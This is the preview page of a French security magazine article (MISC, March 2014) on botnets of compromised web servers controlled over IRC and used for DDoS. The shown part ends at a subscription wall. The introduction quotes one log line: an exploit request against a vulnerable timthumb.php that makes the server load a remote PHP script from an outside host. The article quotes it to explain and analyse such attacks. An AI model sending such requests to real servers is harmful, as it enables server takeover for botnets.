WebBotNets

Magazine
Marque
MISC
Numéro
72
Mois de parution
mars 2014
Spécialité(s)


Résumé

Pour lancer un DDoS, il faut évidemment contrôler plusieurs machines. Mais au lieu de prendre la main sur le PC poussif de monsieur tout le monde simplement connecté via l'ADSL, pourquoi ne pas prendre directement la main sur des serveurs Web ?


1. Introduction

Qui ne s’est jamais posé cette question en regardant les logs d’accès de son serveur web ; quelle est cette étrange ligne de log ?

"GET /wp-content/themes/modularity/includes/timthumb.php?src=http://picasa.com.rnt.ca/bat.php HTTP/1.1\”

Ces lignes de logs mettent à jour tout un petit monde de botnets constitué de serveurs web Zombies lardés de backdoors le tout opérant principalement au travers d’IRC. C’est cet écosystème, les us et coutumes de quelques groupes de pirates, et l'utilisation de ces botnets dans le cadre d’un DDoS que nous allons découvrir et tenter de décrypter. Tous les samples que nous allons voir ici sont disponibles sur [AVCaesar], leurs hashs MD5 est disponible dans la section liens.

Les vecteurs d’infections des machines membres de ces botnets sont principalement les failles des applications web (CMS, moteurs de blogs,…

Cet article est réservé aux abonnés. Il vous reste 97% à découvrir.
S'abonner à Connect
  • Accédez à tous les contenus de Connect en illimité
  • Découvrez des listes de lecture et des contenus Premium
  • Consultez les nouveaux articles en avant-première
Je m'abonne


Article rédigé par

Abonnez-vous maintenant

et profitez de tous les contenus en illimité

Je découvre les offres

Déjà abonné ? Connectez-vous